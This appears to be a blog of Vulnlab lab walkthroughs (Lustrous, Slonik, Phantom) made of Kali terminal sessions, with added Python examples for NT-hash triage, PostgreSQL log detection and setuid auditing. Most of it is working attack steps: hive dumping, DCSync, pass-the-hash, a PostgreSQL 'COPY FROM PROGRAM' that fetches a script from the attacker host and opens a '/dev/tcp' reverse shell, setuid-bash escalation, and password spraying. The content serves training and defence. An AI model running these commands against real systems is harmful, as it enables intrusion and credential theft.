[*] LUSDC$::LUSTROUS:aaaaaaaaaaaaaaaa:a1abcb5128891908dd06050c91ebec30:0101000000000000002a54d31ee0da01c6fce3df3ca0410000000000010010006e0072006a00530065004b004f005800030010006e0072006a00530065004b004f00580002001000580070006f006200540046004900570004001000580070006f006200540046004900570007000800002a54d31ee0da0106000400020000000800300030000000000000000000000000400000e15257875fa1332fbc03b8a4fe3db518132560a8e7b113c3bb02a72a24cd55ff0a0010000000000000000000000000000000000009001e0063006900660073002f00310030002e0038002e0032002e003100330038000000000000000000
[*] AUTHENTICATE_MESSAGE (LUSTROUS\LUSDC$,LUSDC)
[*] User LUSDC\LUSDC$ authenticated successfully
[*] ..snip..
[*] Disconnecting Share(1:smb)
[*] Closing down connection (10.10.187.53,54551)
[*] Remaining connections []


┌──(puck㉿kali)-[~/vulnlab/lustrous]
└─$ impacket-reg lustrous.vl/'tony.ward':'U_cP<redacted>0i1X'@10.10.187.53 -dc-ip 10.10.187.53 backup -o \\\\10.8.2.138\\smb  
Impacket v0.12.0.dev1 - Copyright 2023 Fortra

[!] Cannot check RemoteRegistry status. Triggering start trough named pipe...
[*] Saved HKLM\SAM to \\10.8.2.138\smb\SAM.save

[*] Saved HKLM\SYSTEM to \\10.8.2.138\smb\SYSTEM.save
[*] Saved HKLM\SECURITY to \\10.8.2.138\smb\SECURITY.save

Now get the machine hashes:

┌──(puck㉿kali)-[~/vulnlab/lustrous]
└─$ impacket-secretsdump -sam SAM.save -system SYSTEM.save -security SECURITY.save LOCAL
Impacket v0.12.0.dev1 - Copyright 2023 Fortra

[*] Target system bootKey: 0x9619c4c8e8d0c1e1314ca899f5573926
[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
Administrator:500:aad3b435b51404eeaad3b435b51404ee:1e<redacted>97:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
[-] SAM hashes extraction for user WDAGUtilityAccount failed. The account doesn't have hash information.
[*] Dumping cached domain logon information (domain/username:hash)
[*] Dumping LSA Secrets
[*] $MACHINE.ACC 
$MACHINE.ACC:plain_password_hex:7c8bc87fdc872e790bbf7789dba9ca54bdcd339a4858b7f0400af019b1ea70c306ca1aa097c61c16db78634d36d95d639e9e5e9486f2ac9366898ab26783e513d475edb080e42b9aa2643b83b6fcca12a57e4232154ad8aa34c32b6d7d3182d2509d8b34990dd5c23852c0149382c412bf45352f3ae8a490a454e6bd4c64a3e441f6dbeecf5f48baedbe7ddae74dd77813392a73150fa751e33f8ac0338877c7f09e54e1baef33094f8a716cd1ccc389027d80c1b834d35edd8cb926a8ba3841ca8f6afb3fa9f53c9fb11c6483ebd1f3127725c2bb160ca325869e91e2136192b454c95bdd4b662f8596518dee210daf
$MACHINE.ACC: aad3b435b51404eeaad3b435b51404ee:28<redacted>54
[*] DPAPI_SYSTEM 
dpapi_machinekey:0x908c1b9d1eba6062f66247d016952eab010c4f62
dpapi_userkey:0xe7d85d4c5db116a07bd02c655623691eae32c387
[*] NL$KM 
 0000   B6 96 C7 7E 17 8A 0C DD  8C 39 C2 0A A2 91 24 44   ...~.....9....$D
 0010   A2 E4 4D C2 09 59 46 C0  7F 95 EA 11 CB 7F CB 72   ..M..YF........r
 0020   EC 2E 5A 06 01 1B 26 FE  6D A7 88 0F A5 E7 1F A5   ..Z...&.m.......
 0030   96 CD E5 3F A0 06 5E C1  A5 01 A1 CE 8C 24 76 95   ...?..^......$v.
NL$KM:b696c77e178a0cdd8c39c20aa2912444a2e44dc2095946c07f95ea11cb7fcb72ec2e5a06011b26fe6da7880fa5e71fa596cde53fa0065ec1a501a1ce8c247695
[*] Cleaning up... 
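Added example (mine, not from the writeup or from Impacket), covering both the iconv/openssl NT-hash one-liner earlier and the secretsdump output above. An NT hash is MD4 over the UTF-16LE encoding of the password; MD4 is implemented here in pure Python because recent OpenSSL builds leave it out of hashlib. The same routine gives the well-known empty-password values (LM aad3b435b51404eeaad3b435b51404ee, NT 31d6cfe0d16ae931b73c59d7e0c089c0) that appear for Guest and DefaultAccount above, so a dump can be triaged for accounts with no password, with an LM hash still stored, or reusing a password already known. The dump lines at the bottom are constructed; only the empty-hash constants and the Summer2024 password come from the page.

```python
"""NT hash computation (pure-Python MD4) and secretsdump triage."""
import struct

MASK = 0xFFFFFFFF


def _rol(x, n):
    return ((x << n) | (x >> (32 - n))) & MASK


def md4(data: bytes) -> bytes:
    """RFC 1320 MD4 over arbitrary-length input."""
    def f(x, y, z): return (x & y) | (~x & z)
    def g(x, y, z): return (x & y) | (x & z) | (y & z)
    def h(x, y, z): return x ^ y ^ z

    a0, b0, c0, d0 = 0x67452301, 0xEFCDAB89, 0x98BADCFE, 0x10325476
    msg = data + b"\x80"
    msg += b"\x00" * ((56 - len(msg) % 64) % 64)   # pad to 56 mod 64
    msg += struct.pack("<Q", len(data) * 8)           # bit length, little-endian

    r2_idx = [0, 4, 8, 12, 1, 5, 9, 13, 2, 6, 10, 14, 3, 7, 11, 15]
    r3_idx = [0, 8, 4, 12, 2, 10, 6, 14, 1, 9, 5, 13, 3, 11, 7, 15]
    for off in range(0, len(msg), 64):
        x = struct.unpack("<16I", msg[off:off + 64])
        a, b, c, d = a0, b0, c0, d0
        # each step updates one register, then the registers rotate roles
        for i in range(16):                                   # round 1
            a = _rol((a + f(b, c, d) + x[i]) & MASK, (3, 7, 11, 19)[i % 4])
            a, b, c, d = d, a, b, c
        for i in range(16):                                   # round 2
            a = _rol((a + g(b, c, d) + x[r2_idx[i]] + 0x5A827999) & MASK,
                     (3, 5, 9, 13)[i % 4])
            a, b, c, d = d, a, b, c
        for i in range(16):                                   # round 3
            a = _rol((a + h(b, c, d) + x[r3_idx[i]] + 0x6ED9EBA1) & MASK,
                     (3, 9, 11, 15)[i % 4])
            a, b, c, d = d, a, b, c
        a0, b0 = (a0 + a) & MASK, (b0 + b) & MASK
        c0, d0 = (c0 + c) & MASK, (d0 + d) & MASK
    return struct.pack("<4I", a0, b0, c0, d0)


def nt_hash(password: str) -> str:
    """NT hash = MD4(UTF-16LE(password)), lowercase hex."""
    return md4(password.encode("utf-16-le")).hex()


EMPTY_LM = "aad3b435b51404eeaad3b435b51404ee"   # LM hash of an empty password
EMPTY_NT = nt_hash("")                            # 31d6cfe0d16ae931b73c59d7e0c089c0


def parse_secretsdump(lines):
    """Parse 'user:rid:lmhash:nthash:::' records; status and LSA-secret lines are skipped."""
    records = []
    for line in lines:
        parts = line.strip().split(":")
        if len(parts) < 4 or not parts[1].isdigit():
            continue
        records.append({"user": parts[0], "rid": int(parts[1]),
                        "lm": parts[2].lower(), "nt": parts[3].lower()})
    return records


def triage(records, known_passwords=()):
    """Flag empty passwords, stored LM hashes, and reuse of passwords already known."""
    known = {nt_hash(p): p for p in known_passwords}
    findings = []
    for r in records:
        if r["nt"] == EMPTY_NT:
            findings.append((r["user"], "empty password"))
        if r["lm"] != EMPTY_LM:
            findings.append((r["user"], "LM hash stored"))
        if r["nt"] in known:
            findings.append((r["user"], "reuses known password " + known[r["nt"]]))
    return findings


# Constructed sample in secretsdump's format; the non-empty hashes are computed
# from made-up passwords and the non-empty LM value is a placeholder.
SAMPLE_DUMP = [
    "[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)",
    "Administrator:500:" + EMPTY_LM + ":" + nt_hash("Summer2024") + ":::",
    "Guest:501:" + EMPTY_LM + ":" + EMPTY_NT + ":::",
    "DefaultAccount:503:" + EMPTY_LM + ":" + EMPTY_NT + ":::",
    "[-] SAM hashes extraction for user WDAGUtilityAccount failed.",
    "legacy:1001:0123456789abcdef0123456789abcdef:" + nt_hash("legacy-pass") + ":::",
]

if __name__ == "__main__":
    print(nt_hash("iydgTvmujl6f"))            # same value as the openssl one-liner
    for finding in triage(parse_secretsdump(SAMPLE_DUMP), known_passwords=["Summer2024"]):
        print(finding)
```

`nt_hash` reproduces the `e67af8b3...` value the writeup fed to mimikatz, and `triage` run over a real dump tells you at a glance which accounts an attacker holding that dump can use without cracking anything.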

Get the user hashes:

┌──(puck㉿kali)-[~/vulnlab/lustrous]
└─$ impacket-secretsdump lustrous.vl/'LUSDC$'@lusdc.lustrous.vl -hashes aad3b435b51404eeaad3b435b51404ee:28<redacted>54 -just-dc-user Administrator
Impacket v0.12.0.dev1 - Copyright 2023 Fortra

[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
Administrator:500:aad3b435b51404eeaad3b435b51404ee:b8<redacted>76:::
[*] Kerberos keys grabbed
Administrator:aes256-cts-hmac-sha1-96:192dc734a2de3bc95bad85d2f4e3380a89ed9edb2341b124745d5dbf7ccdf6bd
Administrator:aes128-cts-hmac-sha1-96:854da5162b192ac9e6d3e15e52d326ff
Administrator:des-cbc-md5:c110a4f7f80d5d86
[*] Cleaning up... 

evil-winrm to the DC:

┌──(puck㉿kali)-[~/vulnlab/lustrous]
└─$ evil-winrm --ip lusdc.lustrous.vl -u 'Administrator' -H 'b8<redacted>76'                                               
                                        
Evil-WinRM shell v3.5
                                        
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
                                        
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
                                        
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\Administrator\Documents> hostname
LusDC
*Evil-WinRM* PS C:\Users\Administrator\Documents> cd ..\desktop
*Evil-WinRM* PS C:\Users\Administrator\desktop> type root.txt
VL{53<redacted>0b}

 


That was fun!

 

 

 

 

 

vulnlab-slonik

vulnlab slonik

A medium Linux box.

┌──(puck㉿kali)-[~/vulnlab/slonik2]
└─$ mkdir extract2
                                                                                                                     
┌──(puck㉿kali)-[~/vulnlab/slonik2]
└─$ sudo mount -t nfs 10.10.99.219: ./extract2
[sudo] password for puck: 
                                                                                                                     
                                                                                                                   
┌──(puck㉿kali)-[~/vulnlab/slonik2]
└─$ cd extract2                                                            
                                                                                                                     
┌──(puck㉿kali)-[~/vulnlab/slonik2/extract2]
└─$ ls -la
total 16
drwxr-xr-x 19 root root 4096 Jul 27 09:22 .
drwxrwxr-x  3 puck puck 4096 Jul 27 09:42 ..
drwxr-xr-x  3 root root 4096 Oct 24  2023 home
drwxr-xr-x 13 root root 4096 Sep 19  2023 var
                                                                                                                     
┌──(puck㉿kali)-[~/vulnlab/slonik2/extract2]
└─$ cd home    
                                                                                                                     
┌──(puck㉿kali)-[~/vulnlab/slonik2/extract2/home]
└─$ ls -la
total 12
drwxr-xr-x  3 root root 4096 Oct 24  2023 .
drwxr-xr-x 19 root root 4096 Jul 27 09:22 ..
drwxr-x---  5 1337 1337 4096 Oct 24  2023 service
                                                                                                                     
┌──(puck㉿kali)-[~/vulnlab/slonik2/extract2/home]
└─$ cd service
cd: permission denied: service
                                                                                                                     
┌──(puck㉿kali)-[~/vulnlab/slonik2/extract2/home]
└─$ ls -la
total 12
drwxr-xr-x  3 root root 4096 Oct 24  2023 .
drwxr-xr-x 19 root root 4096 Jul 27 09:22 ..
drwxr-x---  5 1337 1337 4096 Oct 24  2023 service
                                                                                                                     
┌──(puck㉿kali)-[~/vulnlab/slonik2/extract2/home]
└─$ sudo usermod -u 1337 1337                 
usermod: no changes
                                                                                                                     
┌──(puck㉿kali)-[~/vulnlab/slonik2/extract2/home]
└─$ sudo su 1337             
$ bash
1337@kali:/home/puck/vulnlab/slonik2/extract2/home$ ls -la
total 12
drwxr-xr-x  3 root root 4096 Oct 24  2023 .
drwxr-xr-x 19 root root 4096 Jul 27 09:22 ..
drwxr-x---  5 1337 1337 4096 Oct 24  2023 service
1337@kali:/home/puck/vulnlab/slonik2/extract2/home$ cd service
1337@kali:/home/puck/vulnlab/slonik2/extract2/home/service$ ls -la
total 40
drwxr-x--- 5 1337 1337 4096 Oct 24  2023 .
drwxr-xr-x 3 root root 4096 Oct 24  2023 ..
-rw-rw-r-- 1 1337 1337   90 Oct 24  2023 .bash_history
-rw-r--r-- 1 1337 1337  220 Oct 24  2023 .bash_logout
-rw-r--r-- 1 1337 1337 3771 Oct 24  2023 .bashrc
drwx------ 2 1337 1337 4096 Oct 24  2023 .cache
drwxrwxr-x 3 1337 1337 4096 Oct 24  2023 .local
-rw-r--r-- 1 1337 1337  807 Oct 24  2023 .profile
-rw------- 1 1337 1337  326 Oct 24  2023 .psql_history
drwxrwxr-x 2 1337 1337 4096 Oct 24  2023 .ssh
1337@kali:/home/puck/vulnlab/slonik2/extract2/home/service$ cat .psql_history
CREATE DATABASE service;
\c service;
CREATE TABLE users ( id SERIAL PRIMARY KEY, username VARCHAR(255) NOT NULL, password VARCHAR(255) NOT NULL, description TEXT);
INSERT INTO users (username, password, description)VALUES ('service', 'aa<redacted>c2'WHERE', network access account');
select * from users;
\q
1337@kali:/home/puck/vulnlab/slonik2/extract2/home/service$ cat .bash_history
ls -lah /var/run/postgresql/
file /var/run/postgresql/.s.PGSQL.5432
psql -U postgres
exit
1337@kali:/home/puck/vulnlab/slonik2/extract2/home/service$

.

crack the hash

┌──(puck㉿kali)-[~/vulnlab/slonik2]
└─$ john hash --format=RAW-MD5
Using default input encoding: UTF-8
Loaded 1 password hash (Raw-MD5 [MD5 256/256 AVX2 8x3])
Warning: no OpenMP support for this hash type, consider --fork=8
Proceeding with single, rules:Single
Press 'q' or Ctrl-C to abort, almost any other key for status
Almost done: Processing the remaining buffered candidate passwords, if any.
Proceeding with wordlist:/usr/share/john/password.lst
se<redacted>ce          (?)     
1g 0:00:00:00 DONE 2/3 (2024-07-27 09:48) 50.00g/s 19200p/s 19200c/s 19200C/s 123456..larry
Use the "--show --format=Raw-MD5" options to display all of the cracked passwords reliably
Session completed. 

SSH connects but immediately disconnects

┌──(puck㉿kali)-[~/vulnlab/slonik2]
└─$ ssh service@10.10.99.219              
The authenticity of host '10.10.99.219 (10.10.99.219)' can't be established.
ED25519 key fingerprint is SHA256:j/hcANass/0veF/m0NAMOR41osL5zUMMMQ9nCYiwjmY.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '10.10.99.219' (ED25519) to the list of known hosts.
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@ 
@@@@@@@@@@@@@@@@@@/     %@@@@@@@@@@.      @&             @@@@@@@@@@@@@@@@@@@@ 
@@@@@@@@@@@@@   ############.    ############   ##########*  &@@@@@@@@@@@@@@@ 
@@@@@@@@@@@  ###############  ###################  /##########  @@@@@@@@@@@@@ 
@@@@@@@@@@ ###############( #######################(  #########  @@@@@@@@@@@@ 
@@@@@@@@@  ############### (#########################  ######### @@@@@@@@@@@@ 
@@@@@@@@@ .##############  ###########################( #######  @@@@@@@@@@@@ 
@@@@@@@@@  ############## (        ##############        ######  @@@@@@@@@@@@ 
@@@@@@@@@. ############## #####   # .########### ##  ##  #####. @@@@@@@@@@@@@ 
@@@@@@@@@@ .############# /########  ########### *##### ###### @@@@@@@@@@@@@@ 
@@@@@@@@@@. ############# (########( ###########/ ##### ##### (@@@@@@@@@@@@@@ 
@@@@@@@@@@@  ###########( #########, ############( ####  ### (@@@@@@@@@@@@@@@ 
@@@@@@@@@@@@ (##########/ #########  ##############  ##  #( @@@@@@@@@@@@@@@@@ 
@@@@@@@@@@@@( ###########  #######  ################  / #  @@@@@@@@@@@@@@@@@@ 
@@@@@@@@@@@@@  ############  ####  ###################    @@@@@@@@@@@@@@@@@@@ 
@@@@@@@@@@@@@@, ##########  @@@      ################            (@@@@@@@@@@@ 
@@@@@@@@@@@@@@@@ .######  @@@@   ###  ##############  #######   @@@@@@@@@@@@@ 
@@@@@@@@@@@@@@@@@(  *   @. #######    ############## (@((&@@@@@@@@@@@@@@@@@@@ 
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@%&@@@@  #############( @@@@@@@@@@@@@@@@@@@@@@@@ 
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@  #############  @@@@@@@@@@@@@@@@@@@@@@@@ 
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@/ ############# ,@@@@@@@@@@@@@@@@@@@@@@@@ 
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@ ############( @@@@@@@@@@@@@@@@@@@@@@@@@ 
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@  ###########  @@@@@@@@@@@@@@@@@@@@@@@@@ 
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@  #######*  @@@@@@@@@@@@@@@@@@@@@@@@@@@ 
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@&   @@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@ 
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@ 
(service@10.10.99.219) Password: 
Welcome to Ubuntu 22.04.3 LTS (GNU/Linux 6.2.0-1014-aws x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage

  System information as of Sat Jul 27 07:50:05 UTC 2024

  System load:  0.21142578125     Processes:             122
  Usage of /:   32.1% of 7.57GB   Users logged in:       0
  Memory usage: 23%               IPv4 address for ens5: 10.10.99.219
  Swap usage:   0%


Expanded Security Maintenance for Applications is not enabled.

0 updates can be applied immediately.

Enable ESM Apps to receive additional future security updates.
See https://ubuntu.com/esm or run: sudo pro status


The list of available updates is more than a week old.
To check for new updates run: sudo apt update

Last login: Tue Oct 24 13:11:33 2023 from 10.10.1.254
Connection to 10.10.99.219 closed.

.

The account's shell closes the session right away, so we use the SSH connection only as a transport (-N, no shell) and forward the remote PostgreSQL Unix socket to a local socket

┌──(puck㉿kali)-[~/vulnlab/slonik2]
└─$ ssh -N -L /tmp/.s.PGSQL.5433:/var/run/postgresql/.s.PGSQL.5432 service@10.10.99.219         
..snip, same banner as above..
(service@10.10.99.219) Password: 

.

┌──(puck㉿kali)-[~/vulnlab/slonik]
└─$ psql -h /tmp -U postgres -p 5433
psql (15.3 (Debian 15.3-0+deb12u1), server 14.9 (Ubuntu 14.9-0ubuntu0.22.04.1))
Type "help" for help.

postgres=# \list
                                             List of databases
   Name    |  Owner   | Encoding | Collate |  Ctype  | ICU Locale | Locale Provider |   Access privileges   
-----------+----------+----------+---------+---------+------------+-----------------+-----------------------
 postgres  | postgres | UTF8     | C.UTF-8 | C.UTF-8 |            | libc            | 
 service   | postgres | UTF8     | C.UTF-8 | C.UTF-8 |            | libc            | 
 template0 | postgres | UTF8     | C.UTF-8 | C.UTF-8 |            | libc            | =c/postgres          +
           |          |          |         |         |            |                 | postgres=CTc/postgres
 template1 | postgres | UTF8     | C.UTF-8 | C.UTF-8 |            | libc            | =c/postgres          +
           |          |          |         |         |            |                 | postgres=CTc/postgres
(4 rows)

postgres=# DROP TABLE IF EXISTS cmd_exec;
NOTICE:  table "cmd_exec" does not exist, skipping
DROP TABLE
postgres=# CREATE TABLE cmd_exec(cmd_output text);
CREATE TABLE
postgres=# COPY cmd_exec FROM PROGRAM 'curl http://10.8.2.138/s | bash';

s contains

#!/bin/bash
bash -i >& /dev/tcp/10.8.2.138/443 0>&1
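The COPY ... FROM PROGRAM above works because the forwarded socket lets us connect as the postgres superuser without a password; on the server side, every one of those statements is a plain log line once statement logging is on. The following is an added example (not code from the box or from these notes): a small detector that flags server-side program execution and file access in PostgreSQL log lines. The log lines are constructed and assume log_statement = 'all' with a log_line_prefix of '%m [%p] %u@%d '.

```python
import re

# Constructed sample of PostgreSQL server log lines (log_statement = 'all',
# log_line_prefix = '%m [%p] %u@%d '). The COPY ... FROM PROGRAM line mirrors
# the statement used in the session above; the rest is filler.
SAMPLE_LOG = """\
2024-07-27 07:55:09.440 UTC [2231] postgres@postgres LOG:  statement: DROP TABLE IF EXISTS cmd_exec;
2024-07-27 07:55:12.003 UTC [2231] postgres@postgres LOG:  statement: CREATE TABLE cmd_exec(cmd_output text);
2024-07-27 07:55:20.771 UTC [2231] postgres@postgres LOG:  statement: COPY cmd_exec FROM PROGRAM 'curl http://10.8.2.138/s | bash';
2024-07-27 07:56:02.500 UTC [2240] service@service LOG:  statement: select * from users;
2024-07-27 07:57:40.020 UTC [2251] postgres@postgres LOG:  statement: COPY users TO '/tmp/users.csv';
2024-07-27 07:58:11.900 UTC [2251] postgres@postgres LOG:  statement: select pg_read_file('/etc/passwd');
"""

# One log line: timestamp (3 tokens), [pid], user@db, then the statement text.
LINE_RE = re.compile(
    r'^(?P<ts>\S+ \S+ \S+) \[(?P<pid>\d+)\] (?P<user>[^@\s]+)@(?P<db>\S+) '
    r'LOG:\s+statement: (?P<sql>.*)$')

# Patterns that need superuser or one of the pg_*_server_* roles; an
# application role should never produce them.
RULES = [
    ('copy_program', re.compile(r'\bCOPY\b.*\b(?:FROM|TO)\s+PROGRAM\b', re.I | re.S)),
    ('copy_file', re.compile(r"\bCOPY\b.*\b(?:FROM|TO)\s+'", re.I | re.S)),
    ('server_file_function',
     re.compile(r'\b(?:pg_read_(?:binary_)?file|pg_ls_dir|lo_import|lo_export)\s*\(', re.I)),
]


def parse_line(line):
    """Split one log line into its fields, or return None if it is not a statement line."""
    m = LINE_RE.match(line)
    return m.groupdict() if m else None


def detect(log_text):
    """Return one finding per (line, rule) match, with the user and database that ran it."""
    findings = []
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec is None:
            continue
        for name, rx in RULES:
            if rx.search(rec['sql']):
                findings.append({'rule': name, 'user': rec['user'], 'db': rec['db'],
                                 'pid': rec['pid'], 'ts': rec['ts'], 'sql': rec['sql']})
    return findings


if __name__ == '__main__':
    for f in detect(SAMPLE_LOG):
        print('%(ts)s %(rule)-22s %(user)s@%(db)s: %(sql)s' % f)
```

The detection only sees what is logged: `log_statement = 'all'` (or at least `'mod'`, which covers COPY FROM) has to be set, and the log has to leave the host, since the same superuser can truncate it. The corresponding hardening is to keep application logins out of the superuser role and out of pg_execute_server_program / pg_read_server_files, and to restrict who can reach the local socket as postgres in pg_hba.conf.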

Privesc

postgres@slonik:/opt/backups/current$  python3 -c 'import pty;pty.spawn("/bin/bash")'
<nt$  python3 -c 'import pty;pty.spawn("/bin/bash")'
postgres@slonik:/opt/backups/current$ export TERM=xterm
export TERM=xterm
postgres@slonik:/opt/backups/current$ 
zsh: suspended  rlwrap nc -nlvp 443
                                                                                                                     
┌──(puck㉿kali)-[~/vulnlab/slonik2]
└─$ stty raw -echo;fg
[1]  + continued  rlwrap nc -nlvp 443
postgres@slonik:/opt/backups/current$

.

postgres@slonik:/var/lib/postgresql/14/main$ chmod 777 pwn
chmod 777 pwn
postgres@slonik:/var/lib/postgresql/14/main$ chmod u+s pwn
chmod u+s pwn
postgres@slonik:/var/lib/postgresql/14/main$ ls -lah /opt/backups/current/
ls -lah /opt/backups/current/
total 3.0M
drwxr-xr-x 19 root root 4.0K Jul 27 08:26 .
drwxr-xr-x  3 root root 4.0K Oct 23  2023 ..
-rw-------  1 root root    3 Jul 27 08:26 PG_VERSION
..snip..
-rw-------  1 root root   88 Jul 27 08:26 postgresql.auto.conf
-rwxrwxrwx  1 root root 1.4M Jul 27 08:26 pwn

postgres@slonik:/var/lib/postgresql/14/main$ /opt/backups/current/pwn -p
/opt/backups/current/pwn -p
pwn-5.1# id    id
id
uid=115(postgres) gid=123(postgres) euid=0(root) groups=123(postgres),122(ssl-cert)
pwn-5.1# cd /rocd /root
cd /root
pwn-5.1# cat rocat root.txt
cat root.txt
VL{b0<redacted>fa}
pwn-5.1# 
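The root shell comes from the backup under /opt/backups/current being written by root while keeping the permission bits the postgres user set on pwn, so `pwn -p` runs with euid 0. The defender's counterpart is a periodic audit of backup destinations for setuid/setgid files that are not on a known baseline. This is an added example, not part of the writeup: it walks a directory, reports every regular file with a setuid or setgid bit, and attaches risk flags; build_demo_tree() creates a constructed stand-in directory with a planted 4777 file so the audit can run offline.

```python
import os
import stat
import tempfile


def find_setuid_files(root):
    """Return sorted [(path, permission bits, uid)] for regular files with setuid/setgid set."""
    hits = []
    for dirpath, _dirs, files in os.walk(root):          # symlinks are not followed
        for name in files:
            path = os.path.join(dirpath, name)
            try:
                st = os.lstat(path)
            except OSError:
                continue                                   # vanished or unreadable: skip
            if stat.S_ISREG(st.st_mode) and st.st_mode & (stat.S_ISUID | stat.S_ISGID):
                hits.append((path, stat.S_IMODE(st.st_mode), st.st_uid))
    return sorted(hits)


def risk_flags(mode, uid):
    """Why a setuid/setgid file is worth a look; the combination seen above is setuid-root + 4777."""
    flags = []
    if mode & stat.S_ISUID and uid == 0:
        flags.append('setuid-root')
    if mode & stat.S_ISGID:
        flags.append('setgid')
    if mode & stat.S_IWOTH:
        flags.append('world-writable')   # anyone can swap the body; the bit survives a copy by root
    if mode & stat.S_IWGRP:
        flags.append('group-writable')
    return flags


def audit(root, baseline=()):
    """Setuid/setgid files under root whose relative path is not in the expected baseline."""
    report = []
    for path, mode, uid in find_setuid_files(root):
        rel = os.path.relpath(path, root)
        if rel in baseline:
            continue
        report.append({'path': rel, 'mode': oct(mode), 'uid': uid, 'flags': risk_flags(mode, uid)})
    return report


def build_demo_tree():
    """Constructed stand-in for a backup directory: one planted 4777 file, one normal config."""
    root = tempfile.mkdtemp(prefix='backup_audit_')
    planted = os.path.join(root, 'pwn')
    with open(planted, 'wb') as fh:
        fh.write(b'#!/bin/sh\n')                          # contents are irrelevant to the audit
    os.chmod(planted, 0o4777)                             # owner may set setuid on their own file
    normal = os.path.join(root, 'postgresql.auto.conf')
    with open(normal, 'wb') as fh:
        fh.write(b'# placeholder\n')
    os.chmod(normal, 0o600)
    return root


if __name__ == '__main__':
    for entry in audit(build_demo_tree()):
        print(entry)
```

Run against the real backup path this would report `pwn` with mode 0o4777 and, because the copy is root-owned, the setuid-root flag. The fix on the backup side is to not preserve mode bits from untrusted sources (or to mount backup destinations nosuid); the audit catches the case where that was forgotten.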

 

vulnlab-phantom

vulnlab-phantom

A medium Windows machine

┌──(puck㉿kali)-[~/vulnlab/phantom]
└─$ crackmapexec smb dc.phantom.vl -u 'guest' -p '' --shares     
SMB         dc.phantom.vl   445    DC               [*] Windows Server 2022 Build 20348 x64 (name:DC) (domain:phantom.vl) (signing:True) (SMBv1:False)
SMB         dc.phantom.vl   445    DC               [+] phantom.vl\guest: 
SMB         dc.phantom.vl   445    DC               [+] Enumerated shares
SMB         dc.phantom.vl   445    DC               Share           Permissions     Remark
SMB         dc.phantom.vl   445    DC               -----           -----------     ------
SMB         dc.phantom.vl   445    DC               ADMIN$                          Remote Admin
SMB         dc.phantom.vl   445    DC               C$                              Default share
SMB         dc.phantom.vl   445    DC               Departments Share                 
SMB         dc.phantom.vl   445    DC               IPC$            READ            Remote IPC
SMB         dc.phantom.vl   445    DC               NETLOGON                        Logon server share 
SMB         dc.phantom.vl   445    DC               Public          READ            
SMB         dc.phantom.vl   445    DC               SYSVOL                          Logon server share

.

crackmapexec smb dc.phantom.vl -u 'guest' -p '' --rid-brute 5000
cat userlist.txt| cut -d '\' -f2 | awk '{print $1}' | tee users.txt

.

smbclient -U 'guest\phantom.vl' //dc.phantom.vl/Public                                       

Password for [GUEST\phantom.vl]:
Try "help" to get a list of possible commands.
smb: \> ls
  .                                   D        0  Thu Jul 11 17:03:14 2024
  ..                                DHS        0  Sun Jul  7 10:39:30 2024
  tech_support_email.eml              A    14565  Sat Jul  6 18:08:43 2024

        6127103 blocks of size 4096. 1181062 blocks available
smb: \> get tech_support_email.eml 
getting file \tech_support_email.eml of size 14565 as tech_support_email.eml (171.4 KiloBytes/sec) (average 171.4 KiloBytes/sec)
smb: \>

EML view gives

Welcome to Phantom!
Dear <NAME>
We are excited to have you on board.
Below are your user credentials:
Username: <USERNAME>
Password: Ph<redacted>t!
Please log in to your account using these credentials. For security reasons, we strongly
recommend that you change your password immediately after your first login.
If you have any questions or need assistance, feel free to reach out to our support team at
techsupport@phantom.vl
Best regards,
The Phant

.

crackmapexec smb dc.phantom.vl -u users.txt -p 'Ph<redacted>t!' --continue-on-success --no-bruteforce

hashcat to find the password for the VeraCrypt file

hashcat -a 0 -m 13721 IT_BACKUP_201123.hc phantom.txt -r phantom.rule
crackmapexec smb dc.phantom.vl -u 'ibryant' -p 'Ph<redacted>t!' -M spider_plus 

Found in the backup file /opt/vyatta/config/tmp/new_config_5175/vpn/sstp/authentication/local-users/username/: lstanley gB<redacted>Rc

.

crackmapexec smb dc.phantom.vl -u users.txt -p gB<redacted>Rc --continue-on-success

.

crackmapexec winrm dc.phantom.vl -u svc_sspr -p gB<redacted>Rc
evil-winrm --ip phantom.vl -u 'svc_sspr' -p 'gB<redacted>Rc'
bloodhound-python -d phantom.vl -v --zip -c all -u 'svc_sspr' -p 'gB<redacted>Rc' -ns 10.10.115.252 --dns-tcp   

Here comes the fun

net rpc password "crose" "Summer2024" -U "phantom.vl"/"svc_sspr"%"gB<redacted>Rc" -S "phantom.vl"

.

crackmapexec ldap dc.phantom.vl -u crose -p Summer2024           
SMB         dc.phantom.vl   445    DC               [*] Windows Server 2022 Build 20348 x64 (name:DC) (domain:phantom.vl) (signing:True) (SMBv1:False)
LDAP        dc.phantom.vl   389    DC               [+] phantom.vl\crose:Summer2024

.

crackmapexec ldap dc.phantom.vl -u crose -p Summer2024 -M maq
SMB         dc.phantom.vl   445    DC               [*] Windows Server 2022 Build 20348 x64 (name:DC) (domain:phantom.vl) (signing:True) (SMBv1:False)
